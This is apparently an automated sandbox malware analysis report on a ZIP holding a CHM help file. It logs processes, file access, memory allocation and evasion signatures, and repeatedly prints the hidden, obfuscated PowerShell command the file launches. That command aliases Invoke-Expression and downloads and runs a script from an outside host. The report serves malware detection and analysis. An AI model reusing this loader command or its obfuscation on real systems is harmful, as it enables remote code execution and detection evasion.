Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Transitdokumente.zip

Overview

General Information

Sample Name:Transitdokumente.zip
Analysis ID:705402
MD5:23272bbcd8f183e8c03873fb0f9c6e56
SHA1:c52f6ba4fe98bf99927d3595071f95348ae9a485
SHA256:c220a262fc0c5c7835debdf7c17303020af2db45487663ffdd6d6e52e729e32a

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Obfuscated command line found
Document exploit detected (process start blacklist hit)
Suspicious powershell command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Allocates memory with a write watch (potentially for evading sandboxes)
Tries to load missing DLLs
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Spawns drivers
Creates a process in suspended mode (likely to inject code)
Contains long sleeps (>= 3 min)

Classification

  • System is w10x64_ra
  • udfs.sys (PID: 4 cmdline: MD5: 42E3C9843486385AA13DBDFF869888D5)
  • hh.exe (PID: 4960 cmdline: "C:\Windows\hh.exe" E:\Transitdokumente.chm MD5: DF73D52FDCE65F90A2E49EFB5248C77C)
    • powershell.exe (PID: 1540 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://stradlingcollection.org/tymoon.txt')|P MD5: CDA48FC75952AD12D99E526D0B6BF70A)
      • conhost.exe (PID: 1576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
  • cleanup
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results
Source: unknownHTTPS traffic detected: 62.182.20.50:443 -> 192.168.2.3:49688 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\alfredo\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\alfredo\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\alfredo\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\alfredo
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\alfredo\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\alfredo\AppData\Roaming\Microsoft

Software Vulnerabilities

barindex
Source: C:\Windows\hh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownDNS traffic detected: queries for: stradlingcollection.org
Source: unknownHTTPS traffic detected: 62.182.20.50:443 -> 192.168.2.3:49688 version: TLS 1.2
Source: C:\Windows\hh.exeSection loaded: msimtf.dll
Source: C:\Windows\hh.exeSection loaded: resourcepolicyclient.dll
Source: C:\Windows\hh.exeSection loaded: mlang.dll
Source: unknownDriver loaded: C:\Windows\System32\drivers\udfs.sys
Source: C:\Windows\hh.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ec23d1294499b4ffba61f212cb1217cd\mscorlib.ni.dll
Source: unknownProcess created: C:\Windows\hh.exe "C:\Windows\hh.exe" E:\Transitdokumente.chm
Source: C:\Windows\hh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://stradlingcollection.org/tymoon.txt')|P
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\hh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://stradlingcollection.org/tymoon.txt')|P
Source: C:\Windows\hh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52A2AAAE-085D-4187-97EA-8C30DB990436}\InprocServer32
Source: C:\Windows\hh.exeFile created: C:\Users\alfredo\AppData\Roaming\Microsoft\HTML Help
Source: C:\Windows\hh.exeFile created: C:\Users\alfredo\AppData\Local\Temp\IMT1DBD.tmp
Source: classification engineClassification label: mal52.expl.winZIP@4/6@1/20
Source: C:\Windows\hh.exeFile read: C:\Users\alfredo\Desktop\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\hh.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Outlook\Capabilities\UrlAssociations

Data Obfuscation

barindex
Source: C:\Windows\hh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://stradlingcollection.org/tymoon.txt')|P
Source: C:\Windows\hh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://stradlingcollection.org/tymoon.txt')|P
Source: C:\Windows\hh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://stradlingcollection.org/tymoon.txt')|P
Source: C:\Windows\hh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://stradlingcollection.org/tymoon.txt')|P
Source: C:\Windows\hh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9741
Source: C:\Windows\hh.exeMemory allocated: 1DD54570000 memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD546E0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54830000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD548B0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54910000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54970000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54990000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD549F0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54A10000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54A30000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54A50000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54A70000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54A90000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54AB0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54AD0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54AF0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54B30000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54B50000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54B70000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54B90000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54BB0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54BD0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54C10000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54C30000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54C50000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54C70000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54C90000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54CB0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54CF0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54D10000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54D30000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54D50000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54D70000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54DB0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54DD0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54DF0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54E10000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54E30000 memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54E50000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54E70000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54EB0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54ED0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54EF0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54F10000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54F30000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54F50000 memory commit | memory reserve | memory write watch
Source: C:\Windows\hh.exeMemory allocated: 1DD54F90000 memory commit | memory reserve | memory write watch
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4540Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\alfredo\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\alfredo\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\alfredo\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\alfredo
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\alfredo\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\alfredo\AppData\Roaming\Microsoft
Source: C:\Windows\hh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden $t0='de5'.replace('d','i').replace('5','x');sal p $t0;$erroractionpreference = 'silentlycontinue';$t56fg = [enum]::toobject([system.net.securityprotocoltype], 3072);[system.net.servicepointmanager]::securityprotocol = $t56fg;'[void' + '] [syst' + 'em.refle' + 'ction.asse' + 'mbly]::loadwi' + 'thpartialname(''microsoft.visualbasic'')'|p;do {$ping = test-connection -comp google.com -count 1 -quiet} until ($ping);$tty='(new-'+'obje'+'ct ne'+'t.we'+'bcli'+'ent)'|p;$mv= [microsoft.visualbasic.interaction]::callbyname($tty,'down' + 'load' + 'str' + 'ing',[microsoft.visualbasic.calltype]::method,'https' + '://stradlingcollection.org/tymoon.txt')|p
Source: C:\Windows\hh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden $t0='de5'.replace('d','i').replace('5','x');sal p $t0;$erroractionpreference = 'silentlycontinue';$t56fg = [enum]::toobject([system.net.securityprotocoltype], 3072);[system.net.servicepointmanager]::securityprotocol = $t56fg;'[void' + '] [syst' + 'em.refle' + 'ction.asse' + 'mbly]::loadwi' + 'thpartialname(''microsoft.visualbasic'')'|p;do {$ping = test-connection -comp google.com -count 1 -quiet} until ($ping);$tty='(new-'+'obje'+'ct ne'+'t.we'+'bcli'+'ent)'|p;$mv= [microsoft.visualbasic.interaction]::callbyname($tty,'down' + 'load' + 'str' + 'ing',[microsoft.visualbasic.calltype]::method,'https' + '://stradlingcollection.org/tymoon.txt')|p
Source: C:\Windows\hh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://stradlingcollection.org/tymoon.txt')|P
